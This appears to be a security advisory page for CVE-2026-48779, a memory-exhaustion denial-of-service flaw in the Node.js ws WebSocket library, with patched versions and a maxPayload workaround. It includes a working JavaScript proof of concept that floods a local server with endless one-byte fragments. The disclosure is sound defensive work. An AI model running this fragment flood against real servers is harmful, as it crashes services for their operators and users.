CVE-2026-48779: ws: Memory exhaustion DoS from tiny fragments and data chunks

Published Jun 15, 2026
·
Updated

Impact

A high volume of exceptionally small fragments and data chunks can be sent by a peer, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM.

Proof of concept

js import { WebSocket, WebSocketServer } from 'ws';

const wss = new WebSocketServer({ port: 0 }, function () { const data = Buffer.alloc(1); const options = { fin: false }; const { port } = wss.address(); const ws = new WebSocket(ws://localhost:${port});

ws.on('open', function () { (function send() { ws.send(data, options, function (err) { if (err) return; send(); }); })(); });

ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(client close - code: ${code} reason: ${reason.toString()}); }); });

wss.on('connection', function (ws) { ws.on('error', console.error); ws.on('close', function (code, reason) { console.log(server close - code: ${code} reason: ${reason.toString()}); }); });

Patches

The vulnerability was fixed in ws@8.21.0 (https://github.com/websockets/ws/commit/bca91adf15677e47dbe4f959653452727be28b94) and backported to ws@7.5.11 (https://github.com/websockets/ws/commit/fd36cd864fcdf62a08273a99e19a7d975401fee8), ws@6.2.4 (https://github.com/websockets/ws/commit/86d3e8a5fb0246ed373860c5fbb0de88824a27f7), and ws@5.2.5 (https://github.com/websockets/ws/commit/b5372ac67bb97a773727b8e9f5035a8123556d53).

Workarounds

In vulnerable versions, the issue can be mitigated by lowering the value of the maxPayload option if possible.

Credits

The vulnerability was responsibly disclosed and fixed by Nadav Magier.

Other sources

ws is an open source WebSocket client and server for Node.js. All versions from 1.1.0 up to (but not including) 5.2.5, from 6.0.0 up to 6.2.4, from 7.0.0 up to 7.5.11, and from 8.0.0 up to 8.21.0 are affected by a memory exhaustion DoS vulnerability. A peer can send a high volume of exceptionally small fragments and data chunks, with modest network traffic, to force the remote peer into allocating and holding structural wrappers that consume far more memory than the default documented message-size limit, leading to process termination due to OOM. This issue has been fixed in versions 5.2.5, 6.2.4, 7.5.11, and 8.21.0.

MITRE

Affected Software

8 affected componentsFixes available
npm/ws>=8.0.0<8.21.0
8.21.0
npm/ws>=7.0.0<7.5.11
7.5.11
npm/ws>=6.0.0<6.2.4
6.2.4
npm/ws>=1.1.0<5.2.5
5.2.5
Ws Project Ws Node.js>=1.1.0<5.2.5
Ws Project Ws Node.js>=6.0.0<6.2.4
Ws Project Ws Node.js>=7.0.0<7.5.11
Ws Project Ws Node.js>=8.0.0<8.21.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade npm/ws to a version that resolves this vulnerability.

    Fixed in 8.21.0
  2. Upgrade

    Upgrade npm/ws to a version that resolves this vulnerability.

    Fixed in 7.5.11
  3. Upgrade

    Upgrade npm/ws to a version that resolves this vulnerability.

    Fixed in 6.2.4
  4. Upgrade

    Upgrade npm/ws to a version that resolves this vulnerability.

    Fixed in 5.2.5
  5. Upgrade

    Upgrade ws to a version that resolves this vulnerability.

    Fixed in 5.2.5
  6. Upgrade

    Upgrade ws to a version that resolves this vulnerability.

    Fixed in 6.2.4
  7. Upgrade

    Upgrade ws to a version that resolves this vulnerability.

    Fixed in 7.5.11
  8. Upgrade

    Upgrade ws to a version that resolves this vulnerability.

    Fixed in 8.21.0
  9. Configuration

    As a mitigation in vulnerable versions, lower the value of the `maxPayload` option if possible.

    ws maxPayload = lower the value of maxPayload

Event History

Jun 15, 2026
Advisory Published
via GitHub·04:34 PM
Data Sourced
via GitHub·04:34 PM
DescriptionSeverityWeaknessAffected Software
Jun 16, 2026
CVE Published
via MITRE·09:26 PM
Data Sourced
via MITRE·09:26 PM
DescriptionSeverityWeakness
Data Sourced
via Red Hat·10:01 PM
DescriptionSeverityAffected Software
Jun 17, 2026
Data Sourced
via NVD·01:20 PM
RemedyDescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What is the severity of CVE-2026-48779?

CVE-2026-48779 has a severity score of 7.5, which is classified as high.

2

What is the impact of CVE-2026-48779?

CVE-2026-48779 allows a peer to send a high volume of small fragments, causing excessive memory allocation and potentially leading to process termination.

3

How do I fix CVE-2026-48779?

To fix CVE-2026-48779, you should update to the latest version of the affected npm/ws package.

4

What versions of npm/ws are affected by CVE-2026-48779?

CVE-2026-48779 affects versions of npm/ws prior to the patched version released after June 15, 2026.

5

Can CVE-2026-48779 lead to denial of service?

Yes, CVE-2026-48779 can lead to a denial of service by consuming excessive memory and terminating the process.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203